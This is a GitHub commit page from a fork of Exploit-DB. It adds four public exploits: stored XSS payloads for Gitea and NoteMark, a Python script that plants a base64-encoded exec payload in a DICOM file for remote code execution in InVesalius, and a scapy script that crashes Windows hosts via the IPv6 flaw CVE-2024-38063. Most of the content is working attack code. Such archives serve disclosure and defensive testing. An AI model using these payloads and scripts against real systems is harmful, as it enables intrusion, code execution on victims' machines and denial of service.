forked from offensive-security/exploitdb
-
Notifications
You must be signed in to change notification settings - Fork 1
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Merge remote-tracking branch 'upstream/main'
- Loading branch information
Showing
5 changed files
with
280 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,20 @@ | ||
| # Exploit Title: Stored XSS in Gitea | ||
| # Date: 27/08/2024 | ||
| # Exploit Authors: Catalin Iovita & Alexandru Postolache | ||
| # Vendor Homepage: (https://github.com/go-gitea/gitea) | ||
| # Version: 1.22.0 | ||
| # Tested on: Linux 5.15.0-107, Go 1.23.0 | ||
| # CVE: CVE-2024-6886 | ||
|
|
||
| ## Vulnerability Description | ||
| Gitea 1.22.0 is vulnerable to a Stored Cross-Site Scripting (XSS) vulnerability. This vulnerability allows an attacker to inject malicious scripts that get stored on the server and executed in the context of another user's session. | ||
|
|
||
| ## Steps to Reproduce | ||
| 1. Log in to the application. | ||
| 2. Create a new repository or modify an existing repository by clicking the Settings button from the `$username/$repo_name/settings` endpoint. | ||
| 3. In the Description field, input the following payload: | ||
|
|
||
| <a href=javascript:alert()>XSS test</a> | ||
|
|
||
| 4. Save the changes. | ||
| 5. Upon clicking the repository description, the payload was successfully injected in the Description field. By clicking on the message, an alert box will appear, indicating the execution of the injected script. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,35 @@ | ||
| # Exploit Title: Stored XSS in NoteMark | ||
| # Date: 07/29/2024 | ||
| # Exploit Author: Alessio Romano (sfoffo) | ||
| # Vendor Homepage: https://notemark.docs.enchantedcode.co.uk/ | ||
| # Version: 0.13.0 and below | ||
| # Tested on: Linux | ||
| # References: | ||
| https://notes.sfoffo.com/contributions/2024-contributions/cve-2024-41819, | ||
| https://github.com/enchant97/note-mark/commit/a0997facb82f85bfb8c0d497606d89e7d150e182, | ||
| https://github.com/enchant97/note-mark/security/advisories/GHSA-rm48-9mqf-8jc3 | ||
| # CVE: CVE-2024-41819 | ||
|
|
||
| ## Steps to Reproduce | ||
| 1. Log in to the application. | ||
| 2. Create a new note or enter a previously created note. | ||
| 3. Access the note editor functionality from the selected note by clicking | ||
| on the "Editor" tab. | ||
| 4. Input the following payload: | ||
| [xss-link](javascript:alert(1)) | ||
| 5. Save the changes. | ||
| 6. Click on the "Rendered" tab to view the rendered markdown version of the | ||
| note. Click on the previously created link to pop the injected alert. | ||
|
|
||
| ## HTTP Request PoC | ||
|
|
||
| PUT /api/notes/<note-uuid>/content HTTP/1.1 | ||
| Host: localhost:8000 | ||
| Accept: */* | ||
| Content-Type: text/plain;charset=UTF-8 | ||
| Content-Length: 34 | ||
| Sec-Fetch-Site: same-origin | ||
| Authorization: Bearer <TOKEN> | ||
|
|
||
|
|
||
| [xss-link](javascript:alert(1)) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,95 @@ | ||
| # Exploit Title: Invesalius 3.1 - Remote Code Execution (RCE) | ||
| # Discovered By: Alessio Romano (sfoffo), Riccardo Degli Esposti (partywave) | ||
| # Exploit Author: Alessio Romano (sfoffo), Riccardo Degli Esposti | ||
| #(partywave) | ||
| # Date: 23/08/2024 | ||
| # Vendor Homepage: https://invesalius.github.io/ | ||
| # Software Link: | ||
| #https://github.com/invesalius/invesalius3/tree/master/invesalius | ||
| # Version: 3.1.99991 to 3.1.99998 | ||
| # Tested on: Windows | ||
| # CVE: CVE-2024-42845 | ||
| # External References: | ||
| #https://notes.sfoffo.com/contributions/2024-contributions/cve-2024-42845, | ||
| #https://github.com/partywavesec/invesalius3_vulnerabilities/tree/main/CVE-2024-42845, | ||
| #https://www.partywave.site/show/research/Tic%20TAC%20-%20Beware%20of%20your%20scan | ||
|
|
||
| # Description: | ||
| #---------------- | ||
| # | ||
| #A Remote Code Execution (RCE) vulnerability exists in the DICOM file import | ||
| #procedure in Invesalius3. This vulnerability afflicts all versions from | ||
| #3.1.99991 to 3.1.99998. The exploitation steps of this vulnerability | ||
| #involve the use of a crafted DICOM file which, once imported inside the | ||
| #victim's client application allows an attacker to gain remote code | ||
| #execution over the victim's machine. | ||
|
|
||
| # Script: | ||
| #---------------- | ||
| # | ||
| ### | ||
| # The script below creates a specifically crafted DICOM payload for | ||
| #CVE-2024-42845. Remote Code Execution is gained once the DICOM file is | ||
| #imported inside the victim's client application. | ||
| ### | ||
| import pydicom | ||
| import base64 | ||
| import argparse | ||
|
|
||
| pydicom.config.settings.reading_validation_mode = pydicom.config.IGNORE | ||
|
|
||
|
|
||
| def encode_payload(plain_payload): | ||
| data = open(plain_payload, 'rb').read() | ||
| return f"exec(__import__('base64').b64decode({base64.b64encode(data)})" | ||
|
|
||
| def prepare_dicom_payload(dicom_file_path, payload): | ||
| try: | ||
| dicom_data = pydicom.dcmread(dicom_file_path) | ||
|
|
||
| values = dicom_data[0x0020, 0x0032].value | ||
| mal = [str(i) for i in values] | ||
| mal.append(encode_payload(payload)) | ||
|
|
||
| except pydicom.errors.InvalidDicomError: | ||
| print("The file is not a valid DICOM file.") | ||
| except Exception as e: | ||
| print(f"An error occurred: {e}") | ||
|
|
||
| return mal | ||
|
|
||
|
|
||
| def modify_dicom_field(dicom_file_path, malicious_tag, outfile, sign): | ||
| try: | ||
| dicom_dataset = pydicom.dcmread(dicom_file_path) | ||
| if sign: | ||
| dicom_dataset.Manufacturer = "Malicious DICOM file creator" | ||
| dicom_dataset.InstitutionName = "Malicious DICOM file institution" | ||
| elem = pydicom.dataelem.DataElement(0x00200032, 'CS', malicious_tag) | ||
| dicom_dataset[0x00200032] = elem | ||
| print(dicom_dataset) | ||
| dicom_dataset.save_as(outfile) | ||
| except Exception as e: | ||
| print(f"An error occurred: {e}") | ||
|
|
||
|
|
||
| if __name__ == "__main__": | ||
| parser = argparse.ArgumentParser(description='Read a DICOM file.') | ||
| parser.add_argument('--dicom', required=True, help='Path to the input DICOM file') | ||
| parser.add_argument('--outfile', required=True, help='Path to the output DICOM file') | ||
| parser.add_argument('--payload', required=False, default=b"print('Test')", help='File that contains the malicious plain python3 code') | ||
| parser.add_argument('--signature', required=False, default=True) | ||
|
|
||
| args = parser.parse_args() | ||
| dicom_infile_path = args.dicom | ||
| dicom_outfile_path = args.outfile | ||
| print(args.signature) | ||
|
|
||
| tmp_tag = prepare_dicom_payload(dicom_infile_path, payload=args.payload) | ||
| if tmp_tag: | ||
| malicious_tag = '\\'.join(tmp_tag) | ||
|
|
||
| modify_dicom_field(dicom_infile_path, malicious_tag, dicom_outfile_path, sign=args.signature) | ||
| exit(0) | ||
| else: | ||
| exit(1) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,126 @@ | ||
| #!/usr/bin/env python3 | ||
| # -*- coding: utf-8 -*- | ||
|
|
||
| # Exploit Title: Windows IPv6 CVE-2024-38063 Checker and Denial-Of-Service | ||
| # Date: 2024-08-07 | ||
| # Exploit Author: Photubias | ||
| # Vendor Homepage: https://microsoft.com | ||
| # Vendor Advisory: [1] https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38063 | ||
| # Version: Windows 10, 11 <10.0.26100.1457 and Server 2016-2019-2022 <10.0.17763.6189 | ||
| # Tested on: Windows 11 23H2 and Windows Server 2022 | ||
| # CVE: CVE-2024-38063 | ||
|
|
||
| import os, subprocess, re, time, sys | ||
|
|
||
| ## Variables | ||
| sDstIP = 'fe80::78b7:6283:49ad:c565' ## Placeholder | ||
| if len(sys.argv) > 1: sDstIP = sys.argv[1] ## Please provide an argument | ||
| sDstMAC = '00:0C:29:55:E1:C8' ## Not required, will try to get the MAC via Neighbor Discovery | ||
| iBatches = 20 | ||
| iCorruptions = 20 ## How many times do we want to corrupt the tcpip.sys memory per batch | ||
|
|
||
| try: | ||
| print('--- Loading Scapy, might take some time ...') | ||
| from scapy.config import conf | ||
| conf.ipv6_enabled = False | ||
| import scapy.all as scapy | ||
| scapy.conf.verb = 0 | ||
| except: | ||
| print('Error while loading scapy, please run "pip install scapy"') | ||
| exit(1) | ||
|
|
||
| import logging | ||
| logging.getLogger('scapy.runtime').setLevel(logging.ERROR) | ||
|
|
||
| def selectInterface(): #adapter[] = npfdevice, ip, mac | ||
| def getAllInterfaces(): | ||
| lstInterfaces=[] | ||
| if os.name == 'nt': | ||
| proc = subprocess.Popen('getmac /NH /V /FO csv | FINDSTR /V /I disconnected', shell=True, stdout=subprocess.PIPE) | ||
| for bInterface in proc.stdout.readlines(): | ||
| lstInt = bInterface.split(b',') | ||
| sAdapter = lstInt[0].strip(b'"').decode() | ||
| sDevicename = lstInt[1].strip(b'"').decode() | ||
| sMAC = lstInt[2].strip(b'"').decode().lower().replace('-', ':') | ||
| sWinguID = lstInt[3].strip().strip(b'"').decode()[-38:] | ||
| proc = subprocess.Popen('netsh int ipv6 show addr "{}" | FINDSTR /I Address'.format(sAdapter), shell=True, stdout=subprocess.PIPE) | ||
| try: sIP = re.findall(r'[\w:]+:+[\w:]+', proc.stdout.readlines()[0].strip().decode())[0] | ||
| except: sIP = '' | ||
| if len(sMAC) == 17: lstInterfaces.append([sAdapter, sIP, sMAC, sDevicename, sWinguID]) # When no or bad MAC address (e.g. PPP adapter), do not add | ||
| else: | ||
| proc = subprocess.Popen('for i in $(ip address | grep -v "lo" | grep "default" | cut -d":" -f2 | cut -d" " -f2);do echo $i $(ip address show dev $i | grep "inet6 " | cut -d" " -f6 | cut -d"/" -f1) $(ip address show dev $i | grep "ether" | cut -d" " -f6);done', shell=True, stdout=subprocess.PIPE) | ||
| for bInterface in proc.stdout.readlines(): | ||
| lstInt = bInterface.strip().split(b' ') | ||
| try: | ||
| if len(lstInt[2]) == 17: lstInterfaces.append([lstInt[0].decode(), lstInt[1].decode(), lstInt[2].decode(), '', '']) | ||
| except: pass | ||
| return lstInterfaces | ||
|
|
||
| lstInterfaces = getAllInterfaces() | ||
| if len(lstInterfaces) > 1: | ||
| i = 1 | ||
| for lstInt in lstInterfaces: #array of arrays: adapter, ip, mac, windows devicename, windows guID | ||
| print('[{}] {} has {} ({})'.format(i, lstInt[2], lstInt[1], lstInt[0])) | ||
| i += 1 | ||
| #sAnswer = input('[?] Please select the adapter [1]: ') | ||
| sAnswer='3' | ||
| else: sAnswer = None | ||
| if not sAnswer or sAnswer == '' or not sAnswer.isdigit() or int(sAnswer) >= i: sAnswer = 1 | ||
| iAnswer = int(sAnswer) - 1 | ||
| sNPF = lstInterfaces[iAnswer][0] | ||
| sIP = lstInterfaces[iAnswer][1] | ||
| sMAC = lstInterfaces[iAnswer][2] | ||
| if os.name == 'nt': sNPF = r'\Device\NPF_' + lstInterfaces[iAnswer][4] | ||
| return (sNPF, sIP, sMAC, lstInterfaces[iAnswer][3]) | ||
|
|
||
| def get_packets(iID, sDstIPv6, sDstMac=None): | ||
| iFragID = 0xbedead00 + iID | ||
| oPacket1 = scapy.IPv6(fl=1, hlim=64+iID, dst=sDstIPv6) / scapy.IPv6ExtHdrDestOpt(options=[scapy.PadN(otype=0x81, optdata='bad')]) | ||
| oPacket2 = scapy.IPv6(fl=1, hlim=64+iID, dst=sDstIPv6) / scapy.IPv6ExtHdrFragment(id=iFragID, m = 1, offset = 0) / 'notalive' | ||
| oPacket3 = scapy.IPv6(fl=1, hlim=64+iID, dst=sDstIPv6) / scapy.IPv6ExtHdrFragment(id=iFragID, m = 0, offset = 1) | ||
| if sDstMac: ## Should always be this, it seems sending to 'ff:ff:ff:ff:ff:ff' does not work | ||
| oPacket1 = scapy.Ether(dst=sDstMac) / oPacket1 | ||
| oPacket2 = scapy.Ether(dst=sDstMac) / oPacket2 | ||
| oPacket3 = scapy.Ether(dst=sDstMac) / oPacket3 | ||
| return [oPacket1, oPacket2, oPacket3] | ||
|
|
||
| def doIPv6ND(sDstIP, sInt): ## Try to get a MAC address via IPv6 Neighbour Sollicitation | ||
| sMACResp = None | ||
| oNeighborSollicitation = scapy.IPv6(dst=sDstIP) / scapy.ICMPv6ND_NS(tgt=sDstIP) / scapy.ICMPv6NDOptSrcLLAddr(lladdr='ff:ff:ff:ff:ff:ff') | ||
| oResponse = scapy.sr1(oNeighborSollicitation, timeout=5, iface=sInt) | ||
| if oResponse and scapy.ICMPv6NDOptDstLLAddr in oResponse: | ||
| sMACResp = oResponse[scapy.ICMPv6NDOptDstLLAddr].lladdr | ||
| return sMACResp | ||
|
|
||
| lstInt = selectInterface() ## NPF, IPv6, MAC, Name | ||
|
|
||
| sMAC = doIPv6ND(sDstIP, lstInt[0]) | ||
| if sMAC: | ||
| print(f'[+] Target {sDstIP} is reachable, got MAC Address {sMAC}') | ||
| sDstMAC = sMAC | ||
| elif sDstMAC != '': | ||
| print('[-] Target not responding to Neighbor Sollicitation Packets, using the provided MAC {}'.format(sDstMAC)) | ||
| else: | ||
| print('[-] Without a MAC address, this exploit will probably not work') | ||
|
|
||
| lstPacketsToSend = [] | ||
| for i in range(iBatches): | ||
| for j in range(iCorruptions): | ||
| lstPacketsToSend += get_packets(j, sDstIP, sDstMAC) + get_packets(j, sDstIP, sDstMAC) | ||
|
|
||
| ## 'send' is Layer3 (let scapy figure out the MAC address), 'sendp' is L2 (MAC address is filled in, much better) | ||
| print('[i] Verifying vulnerability against IPv6 address {}'.format(sDstIP)) | ||
| ## Verification first: "ICMPv6ParamProblem" | ||
| lstResp = scapy.srp1(lstPacketsToSend[0], iface=lstInt[0], timeout=5) | ||
| if lstResp and scapy.IPv6 in lstResp[0] and scapy.ICMPv6ParamProblem in lstResp[0]: | ||
| print('[+] Yes, {} is vulnerable and exploitable for CVE-2024-38063'.format(sDstIP)) | ||
| else: | ||
| input('[-] Not vulnerable or firewall is enabled. Please verify and rerun or press enter to continue') | ||
| print('[i] Waiting 10 seconds to let the target cool down (more is better)') | ||
| time.sleep(10) | ||
| input('[?] OK, continue to execute the Denial Of Service (BSOD)? Press Ctrl+C to cancel now') | ||
| ########## Exploit | ||
| print('[+] Sending {} packets now via interface {} {}'.format(len(lstPacketsToSend), lstInt[0], lstInt[3])) | ||
| scapy.conf.verb = 1 | ||
| scapy.sendp(lstPacketsToSend, iface=lstInt[0]) | ||
| print('[+] All packets are sent, now it takes *exactly* 60 seconds for the target to crash') |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters